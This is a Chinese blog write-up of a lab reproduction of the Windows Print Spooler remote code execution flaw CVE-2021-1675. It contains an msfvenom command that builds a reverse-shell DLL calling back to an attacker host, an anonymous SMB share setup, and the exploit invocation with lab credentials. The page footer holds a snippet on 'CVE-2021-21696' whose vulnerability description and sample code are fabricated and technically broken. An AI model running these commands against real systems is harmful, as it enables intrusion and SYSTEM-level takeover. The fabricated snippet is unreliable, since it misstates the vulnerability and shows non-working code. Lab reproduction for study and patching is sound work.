Windows Print Spooler 远程代码执行漏洞(CVE-2021-1675)

最新推荐文章于 2025-06-17 15:06:09 发布
最新推荐文章于 2025-06-17 15:06:09 发布
阅读量2.7k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: 内网渗透 漏洞复现 文章标签: CVE-2021-1675 Print Spooler 远程代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Adminxe/article/details/118424911

0x00 漏洞详情

Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。该RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序。此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的打印机将使用哪个驱动程序的信息。另一个参数,dwFileCopyFlags指定如何复制替换打印机驱动程序文件。攻击者可以利用任何经过身份验证的用户都可以调用RpcAddPrinterDriverEx()并指定位于远程服务器上的驱动程序文件这一事实。这会导致 Print Spooler 服务spoolsv.exe以 SYSTEM 权限执行任意 DLL 文件中的代码。

影响版本:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows RT 8.1

Windows 8.1 for x64-based systems

Windows 8.1 for 32-bit systems

Windows 7 for x64-based Systems Service Pack 1

Windows 7 for 32-bit Systems Service Pack 1

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows Server, version 20H2 (Server Core Installation)

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server, version 2004 (Server Core installation)

Windows 10 Version 2004 for x64-based Systems

Windows 10 Version 2004 for ARM64-based Systems

Windows 10 Version 2004 for 32-bit Systems

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for 32-bit Systems

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

0x01 漏洞复现

环境:win11(10.0.13.249,192.168.133.1)和kali虚拟机(192.168.133.145)nat模式。

1.1 win11开启这个打印机服务

1.2 DLL生成

kali到tmp目录生成dll

msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.133.145 LPORT=3333 -o reverse.dll

1.3  SMB 配置

cat /etc/samba/smb.conf

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes
    force user = smbuser

如果是windows

From windows it's also possible

mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot

1.4 下载脚本

github下载这个项目

git clone https://github.com.cnpmjs.org/cube0x0/CVE-2021-1675.git   #这里用.cnpmjs.org做下载加速

运行脚本前需要重新安装impacket

pip3 uninstall impacket
git clone https://github.com.cnpmjs.org/cube0x0/impacket
cd impacket
python3 ./setup.py install  #运行失败前面加个sudo

检查目标是不是存在漏洞,如果有输出表示存在

rpcdump.py @192.168.133.1 | grep MS-RPRN  

1.5 漏洞利用

在脚本文件目录下执行以下代码,xu:79112167为win11用户名和密码,

python3 CVE-2021-1675.py xu:79112167@192.168.133.1 ‘\\192.168.133.145\smb\reverse.dll’
msf建立监听

msf6 > use multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.133.145
msf6 exploit(multi/handler) > set LPORT 3333

脚本执行试一下,发现执行失败

还是失败,从报错原因来看感觉是没有打开权限?

换个ip试试,也不行

换个域环境试试。域环境为2012 R2 ,只打开了这个域的一台虚拟机。ip为192.168.133.144。

出现的错误和这个视频演示的差不多,

1、https://www.youtube.com/watch?v=gzJNumgbvMk

windows应用程序那里安装smb1

同时给出视频:

https://www.youtube.com/watch?v=qU3vQ-B-FPY

0x02 参考链接

1,https://www.kb.cert.org/vuls/id/383432

2,https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675

3,https://github.com/afwu/PrintNightmare

4,https://github.com/cube0x0/CVE-2021-1675

转载请注明:Adminxe's Blog » 密码保护:Windows Print Spooler 远程代码执行漏洞(CVE-2021-1675)

内网渗透(六十五)之Windwos Print Spooler 权限提升漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-09 511
2021年6月9日,微软发布6月份安全补丁更新,修复了50个安全漏洞,其中包括Windows Print Spooler 权限提升漏洞。普通用户可以利用此漏洞以管理员身份在运行打印后台处理程序服务的系统上执行任意代码。如果在域环境中合适的条件下,无需任何用户交互,未经身份验证的远程攻击者就可以利用该漏洞以System权限在域控上执行任意代码,从而获得整个域的控制权。因此,其实在6月份的安全补丁更新中,微软就已经修复了该漏洞,但是该漏洞的exp并有在网络上公开。
Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
HBohan的博客
07-19 1686
近日,有安全研究员在github上公开了”CVE-2021-1675”的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 漏洞复现 【学习网络安全但不知道怎么开始的来call me】 ​ 这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分.
零日漏洞 | 微软披露最新 Windows Print Spooler 远程代码执行漏洞CVE-2021-34527)
爱国小白帽
07-02 1469
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中。 360漏洞云监测到微软最新披露了一个新的Windows Print Spooler远程代码执行漏洞CVE-2021-34527),微软已知该漏洞存在在野利用。该漏洞目前为零日状态,微软暂未发布修复。 该漏洞源于Windows Print Spooler服务执行特权文件操作不当,攻击者可利用该漏洞以系统权限运行任意代码。攻击者可以安装
CVE-2024-38063:Windows TCP/IP 远程执行代码漏洞分析
lytaaaa的博客
06-17 741
摘要:Windows系统曝出高危漏洞CVE-2024-38063,该漏洞存在于TCP/IP协议栈中,攻击者通过发送特制IPv6数据包即可触发整数溢出,导致远程代码执行或系统蓝屏。目前已有公开PoC可重现漏洞攻击效果。微软已发布补丁修复,临时缓解方案可禁用IPv6(但可能影响网络服务)。
漏洞情报 | Windows Print Spooler 远程代码执行漏洞CVE-2021-1675)POC公开
爱国小白帽
06-29 1721
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中。 微软在2021年6月的安全更新中修复了一处 Windows Print Spooler 远程代码执行漏洞CVE-2021-1675)。今天,360漏洞云监测到安全研究人员公布了该漏洞的POC。 该漏洞源于Windows Print Spooler未能正确地实施安全限制,攻击者可绕过RpcAddPrinterDriver的安全检查,在
CVE-2021-1675Windows Print Spooler 远程代码执行漏洞
子曰小玖的博客
09-07 2973
0x00 漏洞详情 Microsoft Windows Print Spooler 服务未能限制对RpcAddPrinterDriverEx()函数的访问,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。该RpcAddPrinterDriverEx()函数用于在系统上安装打印机驱动程序。此函数的参数之一是DRIVER_CONTAINER对象,它包含有关添加的打印机将使用哪个驱动程序的信息。另一个参数,dwFileCopyFlags指定如何复制替换打印机驱动程序文件。攻击者可以利
[CVE-2017-8464]Microsoft Windows远程命令执行漏洞复现
weixin_30237719的博客
06-16 341
版权声明:本文为博主的原创文章,未经博主同意不得转载 前言 记录下自己的复现,保留意见 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,分别存在于LNK文件和Windows Search功能中。黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 概述 微软的...
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
m0_56642842的博客
07-26 3450
0x00 简介 微软6月发布的安全更新补丁中包括了一个Windows Print Spooler权限提升漏洞漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 0x01 漏洞概述 Print SpoolerWindows系统中管理打印相关事务的服务,用于管理所有本地和网络打印队列并控制所有打印工作。Windows系统默认开启
CVE-2021-1675Windows Print Spooler RCE
weixin_39664643的博客
07-29 863
漏洞复现】Windows Print Spooler RCE 前言 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。 若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。 攻击者可以利用任何经过身份验证的用户都可以调用RpcAddPrinterDriverEx
Windows Print Spooler服务最新漏洞CVE-2024-34527详解
2401_83621136的博客
04-01 350
这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分析都是基于Windows server 2019,2021-6补丁的,winver=17763.1999。经笔者测试在无任何补丁的Windows server 2019,winver=17763.107环境下使用以下步骤也可以复现RCE。实现RCE的条件如下:1.一个普通权限的域账户,用另一台计算机使用该域账户登录加入域环境。其中域账户权限如下。
〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现
K8哥哥
07-11 2551
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 漏洞描述 Print SpoolerWindows系统中用于管理打印相关事务的服务。 该漏洞在域环境中合适的条件下,无需任何用户交互,未经身
cve-2021-1675复现
Shanfenglan's blog
07-08 1972
文章目录1. 参考文章2. 环境配置2.1 samba配置2.2 特殊的impacket配置3. 漏洞复现3.1 使用msf生成恶意dll并开启监听3.2 上传恶意dll到共享文件夹内3.3 使用exp进行利用4. 利用成果: 1. 参考文章 CentOS7搭建Samba共享文件夹 设置无密码登录 exp: cube0x0/CVE-2021-1675 2. 环境配置 2.1 samba配置 需要有一台linux机器,配置可无密码访问的共享文件夹。 下载samba: apt-get install samba
【POC公开】CVE-2021-1675: Windows Print Spooler远程代码执行漏洞通告
爱国小白帽
06-29 1534
** 赶紧点击上方话题进行订阅吧!** 报告编号:B6-2021-062902 报告来源:360CERT 报告作者:360CERT 更新日期:2021-06-29 1 漏洞简述 2021年06月29日,360CERT监测发现安全研究人员在GitHub上公开了Windows Print Spooler远程代码执行漏洞的POC,漏洞编号为CVE-2021-1675漏洞等级:严重,漏洞评分:7.8。 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可
CVE-2021-1675 Print Spooler漏洞复现远程执行及提权
m0_55937801的博客
04-09 5451
CVE-2021-1675
微软漏洞 Cve-2021-1675复现
weixin_42345596的博客
07-07 3266
受影响版本 Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 (Server Core installation) Windows Server 2012 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Ser
Windows Print Spooler远程代码执行漏洞复现(CVE-2021-1675
yangbz123的博客
07-05 5693
目录漏洞概述漏洞复现一、PowerShell脚本实现本地提权二、Windows Print Spooler RCE域控MSF上线Cobalt Strike上线三、mimikatz武器化攻击漏洞防御参考链接 漏洞概述 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该
15张超详细的Python学习路线图,纯良心分享,新手小白学习宝典
m0_60452293的博客
04-13 593
是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!结合自身的学习经验以及与很多自学者的沟通了解,我们整理出。,供诸位尚未入门或刚入门不久的同学参考。
漏洞又来! windows远程桌面服务远程执行代码漏洞
shipinginfo的博客
05-16 5909
声明:本文引用翻译来源于微软官网(链接查看:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708) 远程桌面服务(以前称为终端服务)中存在远程执行代码漏洞CVE-2019-0708修复程序,当未经身份验证的攻击者使用RDP连接到目标系统并发送特制请求时。此漏洞是预身份验证,无需用...
问题: 安装虚拟打印机时弹出AddPrinterDriver 返回 126的错误, 如下图:
chenguangxing3的专栏
12-26 6004
问题: 安装虚拟打印机时弹出AddPrinterDriver 返回 126的错误, 如下图: 解决: 下载srclient.dll到C:\Windows\System32\ 参考资料: http://blog.sina.com.cn/s/blog_4bcb14eb0100vv7a.html
CVE-2021-21696漏洞利用
最新发布
06-19
### CVE-2021-21696 漏洞利用方法与攻击流程分析 #### 1. 漏洞背景 CVE-2021-21696 是一个存在于 Windows Print Spooler 服务中的权限提升漏洞,允许本地攻击者通过恶意 DLL 注入技术在系统上执行任意代码[^3]。该漏洞源于 Print Spooler 服务未能正确验证某些打印作业的来源,从而导致未经授权的 DLL 加载行为。 #### 2. 漏洞利用方式 攻击者可以利用此漏洞通过以下方式实现权限提升: - **DLL 注入**:攻击者可以通过创建恶意 DLL 文件并将其放置在特定路径下,使得 Print Spooler 服务加载该 DLL 并执行其中的恶意代码。 ```python import os # 创建恶意 DLL 文件 malicious_dll_content = b"\x90" * 100 # NOP sled malicious_dll_content += b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" # 示例 shellcode with open("C:\\Windows\\System32\\Printers\\malicious.dll", "wb") as f: f.write(malicious_dll_content) # 写入恶意 DLL 内容[^3] ``` - **远程访问工具**:结合其他漏洞(如 CVE-2021-1675CVE-2021-34527),攻击者可以从远程系统发起攻击,进一步扩大影响范围。 #### 3. 攻击流程详解 - **触发漏洞**:攻击者需要构造特定的打印作业请求,以触发 Print Spooler 服务加载恶意 DLL。这通常涉及发送特制的打印任务到目标系统[^3]。 ```python import win32print # 发送特制打印任务 printer_name = win32print.GetDefaultPrinter() hPrinter = win32print.OpenPrinter(printer_name) job_info = { "pDriverName": "malicious_driver", "pDevMode": None, "pDatatype": "RAW", "pParameters": None, "pSecurityDescriptor": None, } job_id = win32print.StartDocPrinter(hPrinter, 1, job_info) # 触发漏洞 ``` - **控制执行流**:当 Print Spooler 服务尝试加载指定的驱动程序时,会自动加载攻击者提供的恶意 DLL,从而执行其中的代码。 - **绕过安全机制**:现代操作系统通常具备多种防护措施(如 ASLR、DEP)。攻击者可能需要结合信息泄露或其他漏洞来绕过这些保护机制。 #### 4. 防护建议 为了防止 CVE-2021-21696 类型的漏洞被利用,可以采取以下措施: - **更新补丁**:确保及时安装微软发布的最新安全更新,以修复已知漏洞- **限制权限**:最小化用户权限,避免非管理员用户对关键系统文件进行修改。 - **监控日志**:启用并定期检查系统日志,以便及时发现可疑活动。 --- ###
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值